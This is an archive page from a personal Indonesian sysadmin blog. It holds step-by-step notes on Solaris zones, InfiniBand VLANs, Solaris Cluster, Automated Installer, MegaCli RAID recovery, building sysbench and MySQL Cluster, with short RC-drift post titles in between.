Delicious

Archives

Categories

Archive for 'Sok Tau' Category





« »

install package dari DVD installer solaris 10:
=======================================
– SUNWs8brandr
– SUNWs8brandu

# lofiadm -a /source/solaris10-u13_sparc.iso
# mount -F hsfs /dev/lofi/1 /mnt
# cd /mnt/Solaris_10/Product/
# pkgadd -d . SUNWs8brandr
# pkgadd -d . SUNWs8brandu

 

install patch solaris8 container / template
=======================================
- download patch untuk solaris8 sparc 11702874 (p11702874_800_SOLARIS64.zip)
- extract

# unzip p11702874_800_SOLARIS64.zip
# gunzip s8containers-bundle-solaris10-sparc.tar.gz
# tar xf s8containers-bundle-solaris10-sparc.tar
# cd  s8containers-bundle/1.0.1/Product/
# pkgadd -d . SUNWs8brandk

 

setup / Install zone

# zonecfg -z solaris8
solaris8: No such zone configured
Use 'create' to begin configuring a new zone.
zonecfg:solaris8> create -t SUNWsolaris8            <--- -t=template
zonecfg:solaris8> set zonepath=/zones/solaris8
zonecfg:solaris8> set autoboot=true
zonecfg:solaris8> add net
zonecfg:solaris8:net> set address=X.X.X.X 
zonecfg:solaris8:net> set physical=e1000g1
zonecfg:solaris8:net> end
zonecfg:solaris8> verify
zonecfg:solaris8> commit
zonecfg:solaris8> exit
 
# zoneadm -z solaris8 install -u -a /path/hasil/extract/patch/tadi/s8-s8zone.flar
 
# zoneadm list -cv
  ID NAME             STATUS     PATH                           BRAND    IP
   0 global           running    /                              native   shared
   - solaris8         installed  /zones/solaris8                solaris8 shared
 
# zoneadm -z solaris8 boot

 

configure zone via console

#zlogin -C -e % solaris8


Trunking Infiniband

  ozzie / 01/09/2014

trunking Infiniband exalogic

Set port mode trunk on catalyst

catalystXX > enable
catalystXX #configure terminal 
Enter configuration commands, one per line.  End with CNTL/Z.
catalystXX # interface Gi0/2
catalystXX (config-if)#switchport mode trunk

 

configure VLAN @ infiniband switch

# showvlan 
   Connector/LAG  VLN   PKEY
   -------------  ---   ------
   0A-ETH-1        0    0xffff
 
# createvlan 0A-ETH-1 -VLAN 193 -PKEY default
# createvlan 0A-ETH-1 -VLAN 195 -PKEY default
# showvlan 
   Connector/LAG  VLN   PKEY
   -------------  ---   ------
   0A-ETH-1        195  0xffff
   0A-ETH-1        193  0xffff
   0A-ETH-1        0    0xffff

 

setup vnic @ compute-node

# dladm show-vnic
LINK                OVER         SPEED  MACADDRESS        MACADDRTYPE       VID
net0e0              net7         10000  2:8:20:48:ca:ea   random            0
net0e1              net8         10000  2:8:20:79:38:53   random            0
 
# dladm create-vnic -l net7 -v 193 vnic0
# dladm create-vnic -l net8 -v 193 vnic1
# dladm create-vnic -l net7 -v 195 vnic2
# dladm create-vnic -l net8 -v 195 vnic3
 
# dladm show-vnic
LINK                OVER         SPEED  MACADDRESS        MACADDRTYPE       VID
net0e0             net7         10000  2:8:20:44:aa:9f   	random            0
net0e1             net8         10000  2:8:20:58:8b:7d   random            0
vnic0               net7         10000  2:8:20:f0:60:62   	random            193
vnic1               net8         10000  2:8:20:f2:c6:e    	random            193
vnic2               net7         10000  2:8:20:5e:f6:63   	random            195
vnic3               net8         10000  2:8:20:f9:fb:d2   	random            195

 

assign vnic for solaris container @ compute-node

# zonecfg -z solariszone1
zonecfg:solariszone1> add net
zonecfg:solariszone1:net> set physical=vnic0
zonecfg:solariszone1:net> end
zonecfg:solariszone1> add net
zonecfg:solariszone1:net> set physical=vnic1
zonecfg:solariszone1:net> end
zonecfg:solariszone1> verify
zonecfg:solariszone1> commit
zonecfg:solariszone1> exit
 
# zoneadm -z solariszone1 reboot
 
# zonecfg -z solariszone2
zonecfg:solariszone2> add net
zonecfg:solariszone2:net> set physical=vnic2
zonecfg:solariszone2:net> end
zonecfg:solariszone2> add net
zonecfg:solariszone2:net> set physical=vnic3
zonecfg:solariszone2:net> end
zonecfg:solariszone2> verify
zonecfg:solariszone2> commit
zonecfg:solariszone2> exit
 
# zoneadm -z solariszone2 reboot

 

verify vnic compute-node

# dladm  show-vnic
LINK                OVER         SPEED  MACADDRESS        MACADDRTYPE       VID
net0e0              net7         10000  2:8:20:48:ca:ea   random            0
net0e1              net8         10000  2:8:20:79:38:53   random            0
vnic0               net7         	 10000  2:8:20:f2:8e:41   random            193
solariszone1/vnic0 net7     10000  2:8:20:f2:8e:41   random            193
vnic1               net8         	 10000  2:8:20:be:ce:6c   random            193
solariszone1/vnic1 net8     10000  2:8:20:be:ce:6c   random            193
vnic2               net7         	 10000  2:8:20:3c:88:32   random           195
solariszone2/vnic2 net7     10000  2:8:20:3c:88:32   random            195
vnic3               net8         	 10000  2:8:20:69:fb:dc   random            195
solariszone2/vnic3 net8      10000  2:8:20:69:fb:dc   random            195


Problem:
ketika switch ke node lain:

# clrg switch -n kambing1 kambing-rg
clrg:  (C748634) Resource group kambing-rg failed to start on chosen node and might fail over to other node(s)
 
# metaset 
# metaset -s kandang-data
metaset: kambing1: setname "kandang-data": no such set
 
# metaset -s kandang-apps
metaset: kambing1: setname "kandang-apps": no such set

shutdown kambing1 (init 0), tinggalkan pada ok promt;

 

- remove kambing1 diskset dari kambing2:

# metaset -s kandang-apps -d -f -h kambing1
# metaset -s kandang-data -d -f -h kambing1

*process ini cukup lama.. biarkan timeout

 
reboot kambing1 dan re-add pada kambing2:

# metaset -s kandang-data -a -h kambing1
# metaset -s kandang-apps  -a -h kambing1

check metaset pada kambing1.. switch resource group antar node;

enjooyyy <:-p



Nyasar lagi #x

  ozzie / 19/05/2014

Nyasar Medan

  ozzie / 06/05/2014

Nyasar party lagi

  ozzie / 04/04/2014

Nyasar Banjarmasin

  ozzie / 28/03/2014

Solaris 11 AI

  ozzie / 27/02/2014

download ISO Solaris 11 AI (>>>>)

# installadm create-service -s /export/home/ozzie/sol-11_1-ai-sparc.iso
Warning: Service svc:/network/dns/multicast:default is not online.
   Installation services will not be advertised via multicast DNS.
 
Creating service from: /export/home/ozzie/sol-11_1-ai-sparc.iso
OK to use subdir of /export/auto_install to store image? [y/N]: Y
Setting up the image ...
 
Creating sparc service: solaris11_1-sparc
 
Image path: /export/auto_install/solaris11_1-sparc
 
Service discovery fallback mechanism set up
Creating SPARC configuration file
Refreshing install services
Warning: mDNS registry of service solaris11_1-sparc could not be verified.
 
Creating default-sparc alias
 
Service discovery fallback mechanism set up
Creating SPARC configuration file
No local DHCP configuration found. This service is the default
alias for all SPARC clients. If not already in place, the following should
be added to the DHCP configuration:
Boot file: http://ip-installserver:5555/cgi-bin/wanboot-cgi
 
Refreshing install services
Warning: mDNS registry of service default-sparc could not be verified.

generate manifest profile:

#sysconfig create-profile -o /var/tmp/client_sc.xml


# installadm create-profile -n default-sparc -f /var/tmp/client_sc.xml -p sclient
# installadm list -p
Service/Profile Name  Criteria
--------------------  --------
default-sparc
   sclient            None

 

# installadm export -n default-sparc -m orig_default -o /var/tmp/OZ.xml
# cat /var/tmp/OZ.xml
<!DOCTYPE auto_install SYSTEM "file:///usr/share/install/ai.dtd.1">
<auto_install>
  <ai_instance name="OZ">
    <target>
      <logical>
        <zpool name="rpool" is_root="true">
          <!--
            Subsequent <filesystem> entries instruct an installer to create
            following ZFS datasets:
 
                <root_pool>/export         (mounted on /export)
                <root_pool>/export/home    (mounted on /export/home)
 
            Those datasets are part of standard environment and should be
            always created.
 
            In rare cases, if there is a need to deploy an installed system
            without these datasets, either comment out or remove <filesystem>
            entries. In such scenario, it has to be also assured that
            in case of non-interactive post-install configuration, creation
            of initial user account is disabled in related system
            configuration profile. Otherwise the installed system would fail
            to boot.
          -->
          <filesystem name="export" mountpoint="/export"/>
          <filesystem name="export/home"/>
          <be name="solaris"/>
        </zpool>
      </logical>
    </target>
    <software type="IPS">
      <destination>
        
      </destination>
      <source>
        <publisher name="solaris">
          <origin name="http://10.10.2.12:9000"/>
        </publisher>
      </source>
      <!--
        The version specified by the "entire" package below, is
        installed from the specified IPS repository.  If another build
        is required, the build number should be appended to the
        'entire' package in the following form:
 
            <name>pkg:/entire@0.5.11-0.build#</name>
      -->
      <software_data action="install">
        <name>pkg:/entire@0.5.11-0.175.1</name>
        <name>pkg:/group/system/solaris-large-server</name>
      </software_data>
    </software>
  </ai_instance>
</auto_install>
 
# installadm create-manifest -n default-sparc -f /var/tmp/OZ.xml   -m OZ -d
# installadm list -n default-sparc  -m
Service/Manifest Name  Status   Criteria
---------------------  ------   --------
default-sparc
   client2             Default  None
   orig_default        Inactive None

 

create local repository

# mount -F hsfs /export/repoSolaris11/sol-11-repo-full.iso /mnt 
# rsync -aP /mnt/repo/ /export/repoSolaris11 
# pkgrepo -s /export/repoSolaris11 refresh 
# svccfg -s application/pkg/server setprop pkg/inst_root=/export/repoSolaris11 
# svccfg -s application/pkg/server setprop pkg/readonly=true 
# svccfg -s application/pkg/server setprop pkg/port=9000 
# svcadm refresh application/pkg/server 
# svcadm enable application/pkg/server

 

booting <:-p

SPARC Enterprise T5220, No Keyboard
Copyright (c) 1998, 2013, Oracle and/or its affiliates. All rights reserved.
OpenBoot 4.33.6.d, 16256 MB memory available, Serial #XXXXXXXX
Ethernet address 0:21:28:3f:7a:c4, Host ID: XXXXXX
 
 
 
{0} ok ssetenv network-boot-arguments  host-ip=client-IP,router-ip=router-ip,subnet-mask=mask-value,hostname=client-name,file=wanbootCGI-URL
{0} ok boot net - install


RCdriftprix series round 2

  ozzie / 10/02/2014




RCdriftprix series round 2 | MGK 9-Feb-2014



RCdriftprix series round 1

  ozzie / 13/01/2014
# /opt/MegaRaid/LSI/MegaCli  -LDInfo -Lall -aALL
Adapter 0 -- Virtual Drive Information:
Virtual Drive: 0 (Target Id: 0)
Name                :
RAID Level          : Primary-1, Secondary-0, RAID Level Qualifier-0
Size                : 278.464 GB
Sector Size         : 512
Mirror Data         : 278.464 GB
State               : Degraded
Strip Size          : 64 KB
Number Of Drives    : 2
Span Depth          : 1
Default Cache Policy: WriteBack, ReadAheadNone, Cached, No Write Cache if Bad BBU
Current Cache Policy: WriteBack, ReadAheadNone, Cached, No Write Cache if Bad BBU
Default Access Policy: Read/Write
Current Access Policy: Read/Write
Disk Cache Policy   : Disk's Default
Encryption Type     : None
Is VD Cached: Yes
Cache Cade Type : Read Only
Exit Code: 0x00

 

# /opt/MegaRaid/LSI/MegaCli  -PDList -aALL
Adapter #0
Enclosure Device ID: 252
Slot Number: 0
Enclosure position: N/A
Device Id: 9
WWN: 5000CCA01600163F
Sequence Number: 6
Media Error Count: 0
Other Error Count: 0
Predictive Failure Count: 0
Last Predictive Failure Event Seq Number: 0
PD Type: SAS
 
Raw Size: 279.396 GB [0x22ecb25c Sectors]
Non Coerced Size: 278.896 GB [0x22dcb25c Sectors]
Coerced Size: 278.464 GB [0x22cee000 Sectors]
Sector Size:  0
Firmware state: Unconfigured(bad)
Device Firmware Level: A31A
Shield Counter: 0
Successful diagnostics completion on :  N/A
SAS Address(0): 0x5000cca01600163d
SAS Address(1): 0x0
Connected Port Number: 1(path0) 
Inquiry Data: HITACHI H109030SESUN300GA31A1335C01GXN          
FDE Capable: Not Capable
FDE Enable: Disable
Secured: Unsecured
Locked: Unlocked
Needs EKM Attention: No
Foreign State: Foreign 
Foreign Secure: Drive is not secured by a foreign lock key
Device Speed: 6.0Gb/s 
Link Speed: 6.0Gb/s 
Media Type: Hard Disk Device
Drive:  Not Certified
Drive Temperature :25C (77.00 F)
PI Eligibility:  No 
Drive is formatted for PI information:  No
PI: No PI
Port-0 :
Port status: Active
Port's Linkspeed: 6.0Gb/s 
Port-1 :
Port status: Active
Port's Linkspeed: Unknown 
Drive has flagged a S.M.A.R.T alert : No
 
Enclosure Device ID: 252
Slot Number: 1
Drive's position: DiskGroup: 0, Span: 0, Arm: 1
Enclosure position: N/A
Device Id: 8
WWN: 5000CCA016002EBB
Sequence Number: 2
Media Error Count: 0
Other Error Count: 0
Predictive Failure Count: 0
Last Predictive Failure Event Seq Number: 0
PD Type: SAS
 
Raw Size: 279.396 GB [0x22ecb25c Sectors]
Non Coerced Size: 278.896 GB [0x22dcb25c Sectors]
Coerced Size: 278.464 GB [0x22cee000 Sectors]
Sector Size:  0
Firmware state: Online, Spun Up
Commissioned Spare : No
Emergency Spare : No
Device Firmware Level: A31A
Shield Counter: 0
Successful diagnostics completion on :  N/A
SAS Address(0): 0x5000cca016002eb9
SAS Address(1): 0x0
Connected Port Number: 0(path0) 
Inquiry Data: HITACHI H109030SESUN300GA31A1335C033GN          
FDE Capable: Not Capable
FDE Enable: Disable
Secured: Unsecured
Locked: Unlocked
Needs EKM Attention: No
Foreign State: None 
Device Speed: 6.0Gb/s 
Link Speed: 6.0Gb/s 
Media Type: Hard Disk Device
Drive:  Not Certified
Drive Temperature :26C (78.80 F)
PI Eligibility:  No 
Drive is formatted for PI information:  No
PI: No PI
Port-0 :
Port status: Active
Port's Linkspeed: 6.0Gb/s 
Port-1 :
Port status: Active
Port's Linkspeed: Unknown 
Drive has flagged a S.M.A.R.T alert : No
Exit Code: 0x00

 

# /opt/MegaRaid/LSI/MegaCli -PDMakeGood -physDrv [252:0] -a0                
Adapter: 0: EnclId-252 SlotId-0 state changed to Unconfigured-Good.
 
Exit Code: 0x00

 

# /opt/MegaRaid/LSI/MegaCli  -PDList -aALL                           
Adapter #0
 
Enclosure Device ID: 252
Slot Number: 0
Enclosure position: N/A
Device Id: 9
WWN: 5000CCA01600163F
Sequence Number: 7
Media Error Count: 0
Other Error Count: 0
Predictive Failure Count: 0
Last Predictive Failure Event Seq Number: 0
PD Type: SAS
 
Raw Size: 279.396 GB [0x22ecb25c Sectors]
Non Coerced Size: 278.896 GB [0x22dcb25c Sectors]
Coerced Size: 278.464 GB [0x22cee000 Sectors]
Sector Size:  0
Firmware state: Unconfigured(good), Spun Up
Device Firmware Level: A31A
Shield Counter: 0
Successful diagnostics completion on :  N/A
SAS Address(0): 0x5000cca01600163d
SAS Address(1): 0x0
Connected Port Number: 1(path0) 
Inquiry Data: HITACHI H109030SESUN300GA31A1335C01GXN          
FDE Capable: Not Capable
FDE Enable: Disable
Secured: Unsecured
Locked: Unlocked
Needs EKM Attention: No
Foreign State: Foreign 
Foreign Secure: Drive is not secured by a foreign lock key
Device Speed: 6.0Gb/s 
Link Speed: 6.0Gb/s 
Media Type: Hard Disk Device
Drive:  Not Certified
Drive Temperature :26C (78.80 F)
PI Eligibility:  No 
Drive is formatted for PI information:  No
PI: No PI
Port-0 :
Port status: Active
Port's Linkspeed: 6.0Gb/s 
Port-1 :
Port status: Active
Port's Linkspeed: Unknown 
Drive has flagged a S.M.A.R.T alert : No
 
Enclosure Device ID: 252
Slot Number: 1
Drive's position: DiskGroup: 0, Span: 0, Arm: 1
Enclosure position: N/A
Device Id: 8
WWN: 5000CCA016002EBB
Sequence Number: 2
Media Error Count: 0
Other Error Count: 0
Predictive Failure Count: 0
Last Predictive Failure Event Seq Number: 0
PD Type: SAS
 
Raw Size: 279.396 GB [0x22ecb25c Sectors]
Non Coerced Size: 278.896 GB [0x22dcb25c Sectors]
Coerced Size: 278.464 GB [0x22cee000 Sectors]
Sector Size:  0
Firmware state: Online, Spun Up
Commissioned Spare : No
Emergency Spare : No
Device Firmware Level: A31A
Shield Counter: 0
Successful diagnostics completion on :  N/A
SAS Address(0): 0x5000cca016002eb9
SAS Address(1): 0x0
Connected Port Number: 0(path0) 
Inquiry Data: HITACHI H109030SESUN300GA31A1335C033GN          
FDE Capable: Not Capable
FDE Enable: Disable
Secured: Unsecured
Locked: Unlocked
Needs EKM Attention: No
Foreign State: None 
Device Speed: 6.0Gb/s 
Link Speed: 6.0Gb/s 
Media Type: Hard Disk Device
Drive:  Not Certified
Drive Temperature :26C (78.80 F)
PI Eligibility:  No 
Drive is formatted for PI information:  No
PI: No PI
Port-0 :
Port status: Active
Port's Linkspeed: 6.0Gb/s 
Port-1 :
Port status: Active
Port's Linkspeed: Unknown 
Drive has flagged a S.M.A.R.T alert : No
Exit Code: 0x00

 

# /opt/MegaRaid/LSI/MegaCli -PDReplaceMissing -physDrv [252:0] -a0

 

# /opt/MegaRaid/LSI/MegaCli -PDOnline -physDrv [252:0] -a0
 
EnclId-252 SlotId-0 state changed to OnLine.
 
Exit Code: 0x00

 

# /opt/MegaRaid/LSI/MegaCli  -PDList -aALL
 
Adapter #0
 
Enclosure Device ID: 252
Slot Number: 0
Drive's position: DiskGroup: 0, Span: 0, Arm: 0
Enclosure position: N/A
Device Id: 9
WWN: 5000CCA01600163F
Sequence Number: 9
Media Error Count: 0
Other Error Count: 0
Predictive Failure Count: 0
Last Predictive Failure Event Seq Number: 0
PD Type: SAS
 
Raw Size: 279.396 GB [0x22ecb25c Sectors]
Non Coerced Size: 278.896 GB [0x22dcb25c Sectors]
Coerced Size: 278.464 GB [0x22cee000 Sectors]
Sector Size:  0
Firmware state: Online, Spun Up
Commissioned Spare : No
Emergency Spare : No
Device Firmware Level: A31A
Shield Counter: 0
Successful diagnostics completion on :  N/A
SAS Address(0): 0x5000cca01600163d
SAS Address(1): 0x0
Connected Port Number: 1(path0) 
Inquiry Data: HITACHI H109030SESUN300GA31A1335C01GXN          
FDE Capable: Not Capable
FDE Enable: Disable
Secured: Unsecured
Locked: Unlocked
Needs EKM Attention: No
Foreign State: None 
Device Speed: 6.0Gb/s 
Link Speed: 6.0Gb/s 
Media Type: Hard Disk Device
Drive:  Not Certified
Drive Temperature :27C (80.60 F)
PI Eligibility:  No 
Drive is formatted for PI information:  No
PI: No PI
Port-0 :
Port status: Active
Port's Linkspeed: 6.0Gb/s 
Port-1 :
Port status: Active
Port's Linkspeed: Unknown 
Drive has flagged a S.M.A.R.T alert : No
 
 
 
Enclosure Device ID: 252
Slot Number: 1
Drive's position: DiskGroup: 0, Span: 0, Arm: 1
Enclosure position: N/A
Device Id: 8
WWN: 5000CCA016002EBB
Sequence Number: 2
Media Error Count: 0
Other Error Count: 0
Predictive Failure Count: 0
Last Predictive Failure Event Seq Number: 0
PD Type: SAS
 
Raw Size: 279.396 GB [0x22ecb25c Sectors]
Non Coerced Size: 278.896 GB [0x22dcb25c Sectors]
Coerced Size: 278.464 GB [0x22cee000 Sectors]
Sector Size:  0
Firmware state: Online, Spun Up
Commissioned Spare : No
Emergency Spare : No
Device Firmware Level: A31A
Shield Counter: 0
Successful diagnostics completion on :  N/A
SAS Address(0): 0x5000cca016002eb9
SAS Address(1): 0x0
Connected Port Number: 0(path0) 
Inquiry Data: HITACHI H109030SESUN300GA31A1335C033GN          
FDE Capable: Not Capable
FDE Enable: Disable
Secured: Unsecured
Locked: Unlocked
Needs EKM Attention: No
Foreign State: None 
Device Speed: 6.0Gb/s 
Link Speed: 6.0Gb/s 
Media Type: Hard Disk Device
Drive:  Not Certified
Drive Temperature :25C (77.00 F)
PI Eligibility:  No 
Drive is formatted for PI information:  No
PI: No PI
Port-0 :
Port status: Active
Port's Linkspeed: 6.0Gb/s 
Port-1 :
Port status: Active
Port's Linkspeed: Unknown 
Drive has flagged a S.M.A.R.T alert : No


RCDI Final 2013

  ozzie / 08/12/2013


Seasons City Mall – 8 dec 2013



Sarinah Never Sleeps 2013

  ozzie / 07/12/2013

Drift lagi…

  ozzie / 21/10/2013

new experience

  ozzie / 14/10/2013

ozzienich

MGK kemayoran, 13-Oct-2013



RC Drift

  ozzie / 11/10/2013

Compiling sysbench @ Solaris-10 SPARC

  ozzie / 05/10/2013

sedikit dokumentasi dari kebanyakan yg gagal install SYSBENCH di Solaris khususnya pada architecture SPARC :D

dengan menu dasar:

 
1. make sure solaris studio sudah siap

# export PATH=$PATH:/opt/solarisstudio/bin

 
2. extract, build & install m4

# cd m4-1.4.17/
# ./configure --prefix=/opt/app
checking for a BSD-compatible install... build-aux/install-sh -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... build-aux/install-sh -c -d
..
..
# make
# make install

 
3. update path binary executable

# export PATH=$PATH:/opt/app/bin

 
4. extract, build & install autoconf

# cd autoconf-2.69/
# ./configure --prefix=/opt/app
checking for a BSD-compatible install... build-aux/install-sh -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... build-aux/install-sh -c -d
..
..
# make
# make install

 
5. extract, build & install automake

# cd automake-1.14
# ./configure --prefix=/opt/app
checking whether make supports nested variables... yes
checking build system type... sparc-sun-solaris2.10
checking host system type... sparc-sun-solaris2.10
checking for a BSD-compatible install... lib/install-sh -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... lib/install-sh -c -d
..
..
# make
# make install

 
6. extract, build & install sysbench
edit file configure.ac

# cd sysbench-0.4.12
# vi configure.ac



edit menjadi AC_PROG_RANLIB

# Checks for programs.
AC_PROG_CC
AC_PROG_LIBTOOL



Menjadi

# Checks for programs.
AC_PROG_CC
AC_PROG_RANLIB


 

# ./configure  --prefix=/opt/sysbench CFLAGS=-m64
checking build system type... sparc-sun-solaris2.10
checking host system type... sparc-sun-solaris2.10
checking target system type... sparc-sun-solaris2.10
checking for a BSD-compatible install... config/install-sh -c
checking whether build environment is sane... yes
..
..
# make 
# make install

 
mari mem-Benchmark OLTP MySQL Enterprise. <:-p <:-p
bagaimana hasilnya?? :>



RC Drift

  ozzie / 11/09/2013

Bermain & Belajar.. agar tidak menjadi SAMPAH penakut yg menambah macet jakarta



MySQL Cluster

  ozzie / 09/07/2013

MySQL Cluster @ Solaris 10.
node1 [10.0.5.41]: nDB, Sql, Management
node2 [10.0.5.42]: nDB, Sql
node3 [10.0.5.43]: nDB, Sql


berhubung cuman develop, struktur direcrory config & datadir nyah ditaruh di /apps

# ls /apps
config
ndb_data
mysql_data

# cat /apps/config/config.ini 
[TCP DEFAULT]
 
[NDB_MGMD DEFAULT]
Datadir=/apps/ndb_data/
 
[NDB_MGMD]
NodeId=1
Hostname=10.0.5.41
 
[NDBD DEFAULT]
NoOfReplicas=2
Datadir=/apps/ndb_data/
 
[NDBD]
Hostname=10.0.5.41
 
[NDBD]
Hostname=10.0.5.42
 
[NDBD]
Hostname=10.0.5.43
 
[MYSQLD]
[MYSQLD]
[MYSQLD]

# cat /apps/config/my.cnf 
[MYSQLD]
ndbcluster
ndb-connectstring=10.0.5.41
datadir=/apps/mysql_data
socket=/tmp/mysql.sock
user=mysql
 
[MYSQLD_SAFE]
log-error=/apps/mysqld.log
pid-file=/apps/mysqld.pid
 
[MYSQL_CLUSTER]
ndb-connectstring=10.0.5.41

Execute @ node1: # /opt/mysql/mysql/bin/ndb_mgmd -f /apps/config/config.ini –configdir=/apps/config/ –initial

# /opt/mysql/mysql/bin/ndb_mgmd -f /apps/config/config.ini  --configdir=/apps/config/
MySQL Cluster Management Server mysql-5.5.30 ndb-7.2.12
bash-3.2# ndb_mgm
-- NDB Cluster -- Management Client --
ndb_mgm> show
Connected to Management Server at: localhost:1186
Cluster Configuration
---------------------
[ndbd(NDB)]     3 node(s)
id=2 (not connected, accepting connect from 10.0.5.41)
id=3 (not connected, accepting connect from 10.0.5.42)
id=4 (not connected, accepting connect from 10.0.5.43)
 
[ndb_mgmd(MGM)] 1 node(s)
id=1    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
 
[mysqld(API)]   3 node(s)
id=5 (not connected, accepting connect from any host)
id=6 (not connected, accepting connect from any host)
id=7 (not connected, accepting connect from any host)

exec @ node1: # /opt/mysql/mysql/bin/ndbmtd –defaults-file=/apps/config/my.cnf

# /opt/mysql/mysql/bin/ndbmtd --defaults-file=/apps/config/my.cnf 
2013-07-09 23:58:44 [ndbd] INFO     -- Angel connected to '10.0.5.41:1186'
2013-07-09 23:58:44 [ndbd] INFO     -- Angel allocated nodeid: 2
 
# ndb_mgm -e show        
Connected to Management Server at: localhost:1186
Cluster Configuration
---------------------
[ndbd(NDB)]     3 node(s)
id=2    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12, starting, Nodegroup: 0)
id=3 (not connected, accepting connect from 10.0.5.42)
id=4 (not connected, accepting connect from 10.0.5.43)
 
[ndb_mgmd(MGM)] 1 node(s)
id=1    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
 
[mysqld(API)]   3 node(s)
id=5 (not connected, accepting connect from any host)
id=6 (not connected, accepting connect from any host)
id=7 (not connected, accepting connect from any host)

execute @ node2 & node3: # /opt/mysql/mysql/bin/ndbmtd –defaults-file=/apps/config/my.cnf

#  /opt/mysql/mysql/bin/ndbmtd --defaults-file=/apps/config/my.cnf 
2013-07-10 00:01:50 [ndbd] INFO     -- Angel connected to '10.0.5.41:1186'
2013-07-10 00:01:50 [ndbd] INFO     -- Angel allocated nodeid: 3

cek pada cluster management:

2# ndb_mgm
-- NDB Cluster -- Management Client --
ndb_mgm> show
Connected to Management Server at: localhost:1186
Cluster Configuration
---------------------
[ndbd(NDB)]     3 node(s)
id=2    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 0, Master)
id=3    @10.0.5.42  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 1)
id=4    @10.0.5.43  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 2)
 
[ndb_mgmd(MGM)] 1 node(s)
id=1    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
 
[mysqld(API)]   3 node(s)
id=5 (not connected, accepting connect from any host)
id=6 (not connected, accepting connect from any host)
id=7 (not connected, accepting connect from any host)
indb_mgm>

Execute pada semua Node:

# /opt/mysql/mysql/scripts/mysql_install_db --defaults-file=/apps/config/my.cnf \
 --user=mysql --datadir=/apps/mysql_data --basedir=/opt/mysql/mysql
 
# /opt/mysql/mysql/bin/mysqld_safe --defaults-extra-file=/apps/config/my.cnf &

# ndb_mgm -e show
Connected to Management Server at: localhost:1186
Cluster Configuration
---------------------
[ndbd(NDB)]     3 node(s)
id=2    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 0, Master)
id=3    @10.0.5.42  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 1)
id=4    @10.0.5.43  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 2)
 
[ndb_mgmd(MGM)] 1 node(s)
id=1    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
 
[mysqld(API)]   3 node(s)
id=5    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
id=6    @10.0.5.42  (mysql-5.5.30 ndb-7.2.12)
id=7    @10.0.5.43  (mysql-5.5.30 ndb-7.2.12)

# mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3
Server version: 5.5.30-ndb-7.2.12-cluster-commercial-advanced MySQL Cluster Server - Advanced Edition (Commercial)
 
Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
 
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
mysql>

tadaaa.. <:-p <:-p
tinggal configure privileges & create database dengan engine ndbcluster



Removing a Node From a Resource Group
how to ngebuang node (monyet3) dari resource group aktif..

# clq show d1   
=== Quorum Devices ===                         
 
Quorum Device Name:                             d1
  Enabled:                                         yes
  Votes:                                           2
  Global Name:                                     /dev/did/rdsk/d1s2
  Type:                                            shared_disk
  Access Mode:                                     scsi3
  Hosts (enabled):                                 monyet3, monyet1, monyet2
 
=== Cluster Resource Groups ===
 
Group Name       Node Name       Suspended      State
----------       ---------       ---------      -----
MySQL-RG         monyet1         No             Offline
                 monyet2         No             Online
                 monyet3         No             Offline
 
 
# clrg status
=== Cluster Resources ===
 
Resource Name       Node Name      State        Status Message
-------------       ---------      -----        --------------
MySQL-RS            monyet1        Offline      Offline
                    monyet2        Online       Online - Service is online.
                    monyet3        Offline      Offline
 
MySQL-LH            monyet1        Offline      Offline - LogicalHostname offline.
                    monyet2        Online       Online - LogicalHostname online.
                    monyet3        Offline      Offline
 
MySQL-HAS           monyet1        Offline      Offline
                    monyet2        Online       Online
                    monyet3        Offline      Offline
 
 
#  scrgadm -pv -g MySQL-RG                   
Res Group name:                                    MySQL-RG
  (MySQL-RG) Res Group RG_description:             <NULL>
  (MySQL-RG) Res Group mode:                       Failover
  (MySQL-RG) Res Group management state:           Managed
  (MySQL-RG) Res Group RG_project_name:            default
  (MySQL-RG) Res Group RG_SLM_type:                manual
  (MySQL-RG) Res Group RG_affinities:              <NULL>
  (MySQL-RG) Res Group Auto_start_on_new_cluster:  True
  (MySQL-RG) Res Group Failback:                   False
  (MySQL-RG) Res Group Nodelist:                   monyet1 monyet2 monyet3
  (MySQL-RG) Res Group Maximum_primaries:          1
  (MySQL-RG) Res Group Desired_primaries:          1
  (MySQL-RG) Res Group RG_dependencies:            <NULL>
  (MySQL-RG) Res Group network dependencies:       True
  (MySQL-RG) Res Group Global_resources_used:      <All>
  (MySQL-RG) Res Group Pingpong_interval:          3600
  (MySQL-RG) Res Group Pathprefix:                 <NULL>
  (MySQL-RG) Res Group system:                     False
  (MySQL-RG) Res Group Suspend_automatic_recovery: False
 
#  scrgadm -pv -g MySQL-RG | grep -i nodelist
  (MySQL-RG) Res Group Nodelist:                   monyet1 monyet2 monyet3
 
# scrgadm -c -g MySQL-RG -h monyet1,monyet2
#  scrgadm -pv -g MySQL-RG | grep -i nodelist
  (MySQL-RG) Res Group Nodelist:                   monyet1 monyet2
 
# scrgadm -pvv -g MySQL-RG | grep -i netiflist
    (MySQL-RG:MySQL-LH) Res property name:         NetIfList
      (MySQL-RG:MySQL-LH:NetIfList) Res property class: extension
      (MySQL-RG:MySQL-LH:NetIfList) Res property description: List of IPMP groups on each node
    (MySQL-RG:MySQL-LH:NetIfList) Res property pernode: False
      (MySQL-RG:MySQL-LH:NetIfList) Res property type: stringarray
      (MySQL-RG:MySQL-LH:NetIfList) Res property value: sc_ipmp0@1 sc_ipmp0@2 sc_ipmp0@3
 
# scrgadm -c -j MySQL-LH  -x netiflist=sc_ipmp0@1,sc_ipmp0@2
